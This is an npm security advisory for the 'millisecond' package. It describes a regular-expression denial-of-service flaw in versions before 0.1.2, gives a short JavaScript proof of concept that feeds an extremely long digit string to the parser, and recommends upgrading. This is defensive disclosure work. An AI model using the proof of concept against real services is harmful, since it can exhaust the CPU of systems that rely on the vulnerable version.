Versions of millisecond prior to 0.1.2 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of concept

var ms = require('millisecond');
var genstr = function (len, chr) {
   var result = "";
   for (i=0; i<=len; i++) {
       result = result + chr;
   }

   return result;
}

ms(genstr(process.argv[2], "5") + " minutea");

Recommendation

Update to version 0.1.2 or later.

References

• unshiftio/millisecond#4
• https://www.npmjs.com/advisories/59